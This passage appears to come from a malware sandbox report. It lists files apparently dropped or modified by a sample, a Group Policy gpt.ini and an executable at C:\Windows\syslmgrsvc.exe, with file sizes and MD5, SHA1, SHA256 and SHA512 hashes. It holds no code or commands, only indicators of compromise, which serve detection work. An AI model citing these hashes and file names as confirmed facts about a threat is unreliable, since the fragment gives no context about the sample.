SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD57cc972a3480ca0a4792dc3379a763572
SHA1f72eb4124d24f06678052706c542340422307317
SHA25602ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7
-
C:\Windows\syslmgrsvc.exeFilesize
93KB
MD5a318cc45e79498b93e40d5e5b9b76be4
SHA14ebc9969cc3c330741c377e22a5fb0cdb8ce5fd5
SHA2564b4e596641d0dd9eece8a24556fd1246056cbc315a79675a7400927858bbd7c2
SHA5123131d627837a3cafdf532173ccadd4beff933ee3d5e050366153434b1394c4d57056b4d273ddb826a1a0478caa83e1f6e095e83366102ae1d3705ab2d3ec0e2c
-